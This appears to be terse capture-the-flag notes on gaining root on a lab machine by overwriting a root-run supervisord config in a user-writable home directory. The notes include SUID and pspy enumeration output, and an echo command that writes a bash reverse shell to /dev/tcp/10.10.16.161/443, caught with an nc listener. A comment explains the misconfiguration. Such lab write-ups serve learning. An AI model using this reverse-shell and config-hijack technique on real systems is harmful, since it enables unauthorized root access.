4 box enum > privesc
SuidEnum
[~] Custom SUID Binaries (Interesting Stuff)
------------------------------
/usr/bin/abuild-sudo
/bin/bbsuid
------------------------------
lacasadepapel [~]$ ls -la
total 24
drwxr-sr-x 4 professo professo 4096 Aug 8 07:14 .
drwxr-xr-x 7 root root 4096 Feb 16 2019 ..
lrwxrwxrwx 1 root professo 9 Nov 6 2018 .ash_history -> /dev/null
drwx------ 2 professo professo 4096 Jan 31 2019 .ssh
-rw-r--r-- 1 root root 88 Jan 29 2019 memcached.ini
-rw-r----- 1 root nobody 434 Jan 29 2019 memcached.js
drwxr-sr-x 9 root professo 4096 Jan 29 2019 node_modules
lacasadepapel [~]$ cat memcached.ini
[program:memcached]
command = sudo -u nobody /usr/bin/node /home/professor/memcached.js
lacasadepapel [/tmp/.d]$ ./pspy64 -f
2019/07/26 05:26:01 FS: OPEN | /etc/supervisord.conf
2019/07/26 05:26:01 FS: ACCESS | /etc/supervisord.conf
2019/07/26 05:26:01 FS: OPEN DIR | /home/professor
2019/07/26 05:26:01 FS: OPEN DIR | /home/professor/
2019/07/26 05:26:01 FS: ACCESS DIR | /home/professor
2019/07/26 05:26:01 FS: ACCESS DIR | /home/professor/
2019/07/26 05:26:01 FS: ACCESS DIR | /home/professor
2019/07/26 05:26:01 FS: ACCESS DIR | /home/professor/
2019/07/26 05:26:01 FS: CLOSE_NOWRITE DIR | /home/professor
2019/07/26 05:26:01 FS: CLOSE_NOWRITE DIR | /home/professor/
2019/07/26 05:26:01 FS: OPEN | /home/professor/memcached.ini
2019/07/26 05:26:01 FS: ACCESS | /home/professor/memcached.ini
2019/07/26 05:26:01 FS: CLOSE_NOWRITE | /home/professor/memcached.ini
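# memcached.ini is root-owned and not writable by us, but it sits in our own home
# directory (owned by professor, see ls -la above), so we can delete it and create a new one.
# pspy shows it being opened right after /etc/supervisord.conf, so supervisord appears to load it.
# Root cause: a privileged service reads its program config from a user-writable directory;
# configs included by a root-run supervisor belong in a root-owned directory.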
lacasadepapel [~]$ echo -e "[program:memcached]\ncommand = bash -c 'bash -i >& /dev/tcp/10.10.16.161/443 0>&1'" > memcached.ini
lacasadepapel [~]$ cat memcached.ini
[program:memcached]
command = bash -c 'bash -i >& /dev/tcp/10.10.16.161/443 0>&1'
$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.16.161] from (UNKNOWN) [10.10.10.131] 58244
bash: cannot set terminal process group (3518): Not a tty
bash: no job control in this shell
bash-4.4# whoami;id
whoami;id
root
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)